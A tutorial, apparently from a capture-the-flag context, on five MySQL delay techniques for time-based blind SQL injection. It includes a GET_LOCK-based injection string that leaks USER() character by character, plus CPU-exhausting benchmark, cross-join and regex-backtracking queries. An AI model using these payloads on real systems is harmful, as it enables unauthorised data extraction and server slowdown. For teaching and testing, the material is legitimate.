Five delay methods for MySQL time blind injection (PWNHUB unexpected solution)

Delay injection function

The five are: sleep(), benchmark(count, expr), a Cartesian product (an expensive cross join), GET_LOCK(), and RLIKE/REGEXP pattern matching.

sleep()

sleep(x) pauses the current statement for x seconds (fractional values are allowed) and returns 0:
select sleep(5);

benchmark() repeatedly executes an expression

 benchmark(count, expr)
     select benchmark(count, expr) evaluates expr count times and returns 0; with a large count the evaluation itself takes long enough to serve as the delay. The delay is CPU-bound, so it varies with the server's hardware and load and has to be calibrated on each target.
     For example, select benchmark(1000000,encode("hello","good")); (ENCODE() was removed in MySQL 8.0.3, so on 8.x use a function that still exists, such as MD5())
     select benchmark( 5000000, md5( 'test' ));

Cartesian Product

Cartesian product (joining large tables without a join condition is expensive)
     A x B is the set of every pairing of a row of A with a row of B, i.e. a cross join. With n-row tables the result has n^2 rows (n^3 for three tables), and the server has to produce every one of them just to count them. information_schema.columns is a convenient large table that exists on every server:
     SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
     select * from table_name A, table_name B
     select * from table_name A, table_name B,table_name C
     select count(*) from table_name A, table_name B, table_name C (the tables can all be the same table; the delay depends on their row counts)

GET_LOCK() Lock

GET_LOCK(key, timeout) needs two connections (sessions): one that holds the lock and one that waits for it.
RELEASE_LOCK(key) releases the lock: returns 1 if it was released, 0 if the current session did not hold it, NULL if no such lock exists.
IS_FREE_LOCK(key) returns 1 if the lock is free and 0 if it is in use; IS_USED_LOCK(key) returns the connection ID of the session holding the lock (NULL if nobody holds it).
key is the name of the lock and timeout is how many seconds to wait for it. GET_LOCK returns 1 if the lock was acquired, 0 if the timeout expired without acquiring it, and NULL on error; nothing is rolled back. A negative timeout waits forever. Before MySQL 5.7.5 a session can hold only one named lock at a time (a second GET_LOCK releases the first); from 5.7.5 on a session can hold several.
This is an application-level named lock shared between MySQL sessions: it locks a name, not a table, row or column, and what it protects is entirely up to the application. It is exclusive: while one session holds it, every other session's GET_LOCK on the same name fails (times out).
session A: select get_lock('test',1); returns 1 immediately
session B: select get_lock('test',5); waits 5 seconds, then returns 0
The lock stays held until it is released explicitly or the session holding it disconnects; a dropped connection never leaves the lock orphaned, unlike a Redis lock that was set without an expiry.
Because it is only a name, the lock does not restrict the data in any way: while session 1 holds the lock, session 2 can read and write anything as long as it never calls get_lock on the same key. The lock is a convention that cooperating connections agree to honour; connections that do not ask for it are not affected and can do whatever they want.

Advantages and disadvantages: (1) it works well for protecting an update of a whole record, but the read that the update depends on must also be executed while holding the lock; (2) the lock is released automatically when the client disconnects, which is better than a Redis lock, where a lock acquired by a client that then disconnects stays set until it expires; (3) the lock covers everything done under that name, not a specific table or row, so all operations that share a key serialise behind the same lock, which can be inefficient; (4) if the read is done before taking the lock, the data may already be stale, and the update will overwrite changes made by other clients between the read and the update.
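The two-session exchange as it looks when GET_LOCK() is used as the delay primitive of a blind injection. This is an added example, not code from the original article: the lock name 'pwn', the 5-second timeout and the predicate on the first byte of USER() are arbitrary choices, and the injection position assumes a hypothetical query of the form SELECT ... WHERE name = '<input>'.

```sql
-- Added example (not from the original article). Lock name, timeout and
-- predicate are arbitrary; the vulnerable query is hypothetical.

-- ---- session 1: acquire and hold. It must stay connected, because the
-- lock is released the moment this session disconnects. ----
SELECT GET_LOCK('pwn', 0);          -- 1: acquired immediately (0 = do not wait)
SELECT IS_USED_LOCK('pwn');         -- connection id of the holder, i.e. ...
SELECT CONNECTION_ID();             -- ... the same value as the line above

-- ---- session 2: the connection the injected query runs on ----
SELECT IS_FREE_LOCK('pwn');         -- 0: somebody else holds it

-- Unconditional: blocks ~5 s, then returns 0 (timed out, lock NOT acquired).
SELECT GET_LOCK('pwn', 5);

-- Conditional: IF() evaluates only the branch it selects, so the statement
-- takes ~5 s when the guess is right and returns 0 at once when it is wrong.
SELECT IF(ASCII(SUBSTRING(USER(), 1, 1)) > 96, GET_LOCK('pwn', 5), 0);

-- The same predicate in an injection position (hypothetical target query
-- SELECT ... WHERE name = '<input>'):
--   ' AND IF(ASCII(SUBSTRING(USER(),1,1))>96, GET_LOCK('pwn',5), 0) AND 'a'='a

-- Pitfall: if the web application reuses the holder's connection (persistent
-- connections, a pool), GET_LOCK is re-entrant for that session and returns 1
-- with no delay. Compare IS_USED_LOCK('pwn') with CONNECTION_ID() to tell.

-- ---- session 1, when finished ----
SELECT RELEASE_LOCK('pwn');         -- 1: released
SELECT IS_FREE_LOCK('pwn');         -- 1: free again
```

Because the delay comes from waiting on another session rather than from CPU work, this variant loads the server far less than benchmark() or a Cartesian product, and its length is exactly the timeout you choose; the price is that the holding session has to be kept alive for the whole extraction.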

RLIKE / REGEXP regular-expression matching

Use rpad() or repeat() to build a long subject string and match it against a pattern that forces heavy backtracking; the delay is controlled by the subject length and the repeat count. Two caveats: a padded string longer than max_allowed_packet comes back as NULL, so the match is skipped and there is no delay; and MySQL 8.0.4+ uses the ICU regex engine, which aborts a match that runs past regexp_time_limit (default 32 ms) with an error instead of running long, so this technique is mainly useful against MySQL 5.x.

select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b');

Regular syntax:
. : matches any single character
*: matches 0 or more of the preceding element
[]: matches any one character listed inside the brackets. [ab]* can match an empty string, a, b, or a string consisting of any number of a's and b's.
^: matches the beginning of a string; ^s matches a string starting with s (or S, since REGEXP is case-insensitive for non-binary strings).
$: matches the end of a string; s$ matches a string ending with s.
{n}: matches the preceding element exactly n times.

RPAD(str, len, padstr)

Right-pads str with padstr until it is len characters long and returns the result; if str is already longer than len, it is truncated to len characters.

mysql> SELECT RPAD('hi',5,'?'); -> 'hi???'

REPEAT(str, count) returns str repeated count times.

⭐️Looking for new delay functions

select concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),
              rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),
              rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),
              rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'))
       RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b';

On the author's machine the statement above took about as long as sleep(5). The time is hardware-dependent and must be calibrated per target, and the concatenated subject is roughly 16 MB, so it only produces a delay where max_allowed_packet is larger than that (otherwise concat() returns NULL and the match never runs).
